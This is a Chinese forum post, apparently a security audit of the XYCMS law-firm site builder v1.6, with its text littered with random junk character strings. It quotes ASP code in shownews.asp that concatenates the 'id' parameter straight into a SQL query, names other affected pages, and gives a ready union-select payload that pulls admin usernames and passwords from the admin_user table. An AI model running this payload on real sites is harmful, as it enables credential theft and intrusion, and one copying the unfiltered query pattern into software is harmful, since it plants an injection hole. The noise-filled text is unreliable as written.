前言:刚才蛋疼无聊下载了审计下,就稍微的看了下,漏洞太多。ps:跟有个投稿的板块文章有点类似
+ N6 L$ H& y5 O( k8 j/ p5 Q 0 E5 l3 A( \( [( N1 G" F0 B
淫荡分割线' P0 G' J# ^/ g& |+ {$ f k
--------------------------------------------------------7 c5 I, ?% V' X, V
0 }+ J& G, n" F* ~; @5 c7 p" U; e审计版本:XYCMS律师事务所建站系统 v1.6(其他版本自测)
/ v, l9 `9 J. {+ r源码地址:http://down.chinaz.com/soft/29233.htm0 ]% t8 _+ p. G$ Z. r+ `6 \
0 T* ]! P5 A8 f5 x6 I
漏洞文件:shownews.asp" J9 p3 M; |% X- {& k) B$ Y
漏洞代码:7-13行
+ t- G8 o3 P0 E) [: a 0 t- F4 j0 F1 p
. F! k, h; z5 }- r8 h
<% y# M6 i- [4 o2 s" g a6 i% |- Z
id=request.QueryString("id")
: R6 U# L/ K) K, N. s# c: L7 y # |8 A* O1 }3 y$ A1 L- _
set snews=server.createobject("adodb.recordset")
/ q& B) v! D! _' q9 Oexec="select * from [news] where id="&id
7 P) k) F4 U5 H2 S) ^$ }. L+ j5 ?/ Wsnews.open exec,conn,1,1/ b) W/ i: C5 X8 ?3 `
%>
. X0 y; Y t7 a! f" Q+ l
7 y$ b& Q! [& ^5 c' @4 Q. x7 a1 T
. f0 Z) h4 `) m- P' r9 |什么过滤都没有 直造成注入$ y3 b# N, g$ x. M* g/ p2 F0 m
; y' ~" z) ?9 Y% e注入点:http://127.0.0.1:99/shownews.asp?id=xx' g1 e8 q9 M* l6 f' l. Y" R
' m0 I! J, c5 W: n- n- F9 _2 |2 }其余相同漏洞文件:showdxal.asp,showfwly.asp 等等自己找
4 A4 q" s. O9 }0 E" Q: u* y5 i 5 [7 I3 H, a0 g8 w) ~7 h
3 h6 ^7 O j* D: hexp: union select 1,admin,password,4,5,7 from admin_user. P. i6 m n n
& e' l3 q3 f f- ?9 @0 c, [5 w |